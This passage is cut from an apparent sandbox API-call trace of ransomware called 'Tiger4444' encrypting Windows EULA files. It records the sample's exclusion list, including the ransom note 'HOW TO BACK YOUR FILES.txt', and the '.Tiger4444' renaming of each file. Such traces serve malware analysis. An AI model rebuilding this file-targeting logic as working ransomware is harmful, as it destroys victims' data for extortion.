lpString2="boot") returned 1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="ids.txt") returned -1 [0043.519] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="NTUSER.DAT") returned -1 [0043.519] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_he-il.htm" | out: lpString1="EULA_he-il.htm") returned="EULA_he-il.htm" [0043.519] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm", dwFileAttributes=0x0) returned 1 [0043.519] lstrlenW (lpString="EULA_he-il.htm") returned 14 [0043.519] lstrlenW (lpString="Tiger4444") returned 9 [0043.519] lstrcmpiW (lpString1="he-il.htm", lpString2="Tiger4444") returned -1 [0043.519] lstrlenW (lpString=".dll") returned 4 [0043.519] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.520] lstrlenW (lpString=".lnk") returned 4 [0043.520] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.520] lstrlenW (lpString=".ini") returned 4 [0043.520] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.520] lstrlenW (lpString=".sys") returned 4 [0043.520] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.520] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.520] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.520] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13497293745) returned 1 [0043.520] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=864647) returned 1 [0043.520] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0043.520] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0043.520] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd3490, lpName=0x0) returned 0x2c8 [0043.521] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd3490) returned 0x2eb0000 [0043.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0043.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0043.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0043.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0043.870] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13532332256) returned 1 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0043.870] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0043.870] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0043.878] CloseHandle (hObject=0x2c8) returned 1 [0043.878] CloseHandle (hObject=0x260) returned 1 [0043.944] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.Tiger4444") returned 62 [0043.944] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm.tiger4444"), dwFlags=0x1) returned 1 [0043.945] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=864656 | out: Addend=0xc6f980) returned 10910688 [0043.945] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=350 | out: Addend=0xc6f98c) returned 3638 [0043.945] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e977f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e977f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfd68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_hr-hr.htm", cAlternateFileName="EULA_H~2.HTM")) returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="Tiger4444.exe") returned -1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2=".") returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="..") returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="windows") returned -1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="bootmgr") returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="pagefile.sys") returned -1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="boot") returned 1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="ids.txt") returned -1 [0043.945] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="NTUSER.DAT") returned -1 [0043.945] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_hr-hr.htm" | out: lpString1="EULA_hr-hr.htm") returned="EULA_hr-hr.htm" [0043.945] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm", dwFileAttributes=0x0) returned 1 [0043.946] lstrlenW (lpString="EULA_hr-hr.htm") returned 14 [0043.946] lstrlenW (lpString="Tiger4444") returned 9 [0043.946] lstrcmpiW (lpString1="hr-hr.htm", lpString2="Tiger4444") returned -1 [0043.946] lstrlenW (lpString=".dll") returned 4 [0043.946] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0043.946] lstrlenW (lpString=".lnk") returned 4 [0043.946] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0043.946] lstrlenW (lpString=".ini") returned 4 [0043.946] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0043.946] lstrlenW (lpString=".sys") returned 4 [0043.946] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0043.946] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0043.946] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0043.946] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13539941985) returned 1 [0043.946] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=64872) returned 1 [0043.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0043.946] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0043.946] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10070, lpName=0x0) returned 0x2c8 [0043.949] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10070) returned 0xbe0000 [0044.013] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0044.014] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0044.014] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13546704892) returned 1 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0044.014] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0044.014] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.015] CloseHandle (hObject=0x2c8) returned 1 [0044.015] CloseHandle (hObject=0x260) returned 1 [0044.017] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.Tiger4444") returned 62 [0044.017] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.018] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=64880 | out: Addend=0xc6f980) returned 11775344 [0044.018] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=67 | out: Addend=0xc6f98c) returned 3988 [0044.018] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ebeab, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ebeab, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14a5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_hu-hu.htm", cAlternateFileName="EULA_H~3.HTM")) returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="Tiger4444.exe") returned -1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2=".") returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="..") returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="windows") returned -1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="bootmgr") returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="pagefile.sys") returned -1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="boot") returned 1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="ids.txt") returned -1 [0044.018] lstrcmpiW (lpString1="EULA_hu-hu.htm", lpString2="NTUSER.DAT") returned -1 [0044.018] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_hu-hu.htm" | out: lpString1="EULA_hu-hu.htm") returned="EULA_hu-hu.htm" [0044.018] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm", dwFileAttributes=0x0) returned 1 [0044.019] lstrlenW (lpString="EULA_hu-hu.htm") returned 14 [0044.019] lstrlenW (lpString="Tiger4444") returned 9 [0044.019] lstrcmpiW (lpString1="hu-hu.htm", lpString2="Tiger4444") returned -1 [0044.019] lstrlenW (lpString=".dll") returned 4 [0044.019] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.019] lstrlenW (lpString=".lnk") returned 4 [0044.019] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.019] lstrlenW (lpString=".ini") returned 4 [0044.019] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.019] lstrlenW (lpString=".sys") returned 4 [0044.019] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.019] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.019] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.019] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13547220811) returned 1 [0044.019] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=84570) returned 1 [0044.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0044.019] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0044.019] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14d60, lpName=0x0) returned 0x2c8 [0044.020] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14d60) returned 0xbe0000 [0044.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.024] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.024] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.024] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.024] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.024] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.024] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13547761269) returned 1 [0044.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0044.025] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0044.025] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.025] CloseHandle (hObject=0x2c8) returned 1 [0044.025] CloseHandle (hObject=0x260) returned 1 [0044.028] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.Tiger4444") returned 62 [0044.028] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hu-hu.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hu-hu.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.029] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=84576 | out: Addend=0xc6f980) returned 11840224 [0044.029] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4055 [0044.029] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ed234, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ed234, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f6d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_it-it.htm", cAlternateFileName="EULA_I~1.HTM")) returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="Tiger4444.exe") returned -1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2=".") returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="..") returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="windows") returned -1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="bootmgr") returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="pagefile.sys") returned -1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="boot") returned 1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="ids.txt") returned -1 [0044.029] lstrcmpiW (lpString1="EULA_it-it.htm", lpString2="NTUSER.DAT") returned -1 [0044.029] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_it-it.htm" | out: lpString1="EULA_it-it.htm") returned="EULA_it-it.htm" [0044.029] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm", dwFileAttributes=0x0) returned 1 [0044.029] lstrlenW (lpString="EULA_it-it.htm") returned 14 [0044.029] lstrlenW (lpString="Tiger4444") returned 9 [0044.029] lstrcmpiW (lpString1="it-it.htm", lpString2="Tiger4444") returned -1 [0044.029] lstrlenW (lpString=".dll") returned 4 [0044.029] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.029] lstrlenW (lpString=".lnk") returned 4 [0044.029] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.029] lstrlenW (lpString=".ini") returned 4 [0044.029] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.030] lstrlenW (lpString=".sys") returned 4 [0044.030] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.030] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.030] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.030] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13548282535) returned 1 [0044.030] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69485) returned 1 [0044.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0044.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0044.030] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11270, lpName=0x0) returned 0x2c8 [0044.031] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11270) returned 0xbe0000 [0044.044] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.044] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.044] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.044] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0044.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.045] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13549764672) returned 1 [0044.045] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0044.045] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0044.045] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.045] CloseHandle (hObject=0x2c8) returned 1 [0044.045] CloseHandle (hObject=0x260) returned 1 [0044.048] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.Tiger4444") returned 62 [0044.048] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.049] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69488 | out: Addend=0xc6f980) returned 11924800 [0044.049] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 4060 [0044.049] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3ef94a, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3ef94a, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3354e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ja-jp.htm", cAlternateFileName="EULA_J~1.HTM")) returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="Tiger4444.exe") returned -1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2=".") returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="..") returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="windows") returned -1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="bootmgr") returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="pagefile.sys") returned -1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="boot") returned 1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="ids.txt") returned -1 [0044.049] lstrcmpiW (lpString1="EULA_ja-jp.htm", lpString2="NTUSER.DAT") returned -1 [0044.049] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_ja-jp.htm" | out: lpString1="EULA_ja-jp.htm") returned="EULA_ja-jp.htm" [0044.049] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm", dwFileAttributes=0x0) returned 1 [0044.049] lstrlenW (lpString="EULA_ja-jp.htm") returned 14 [0044.050] lstrlenW (lpString="Tiger4444") returned 9 [0044.050] lstrcmpiW (lpString1="ja-jp.htm", lpString2="Tiger4444") returned -1 [0044.050] lstrlenW (lpString=".dll") returned 4 [0044.050] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.050] lstrlenW (lpString=".lnk") returned 4 [0044.050] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.050] lstrlenW (lpString=".ini") returned 4 [0044.050] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.050] lstrlenW (lpString=".sys") returned 4 [0044.050] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.050] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ja-jp.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ja-jp.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.050] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.050] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13550320485) returned 1 [0044.050] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=210254) returned 1 [0044.050] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0044.050] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0044.050] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33850, lpName=0x0) returned 0x2c8 [0044.051] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33850) returned 0xbe0000 [0044.061] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.061] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0044.061] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.061] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0044.061] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.062] HeapFree (in: 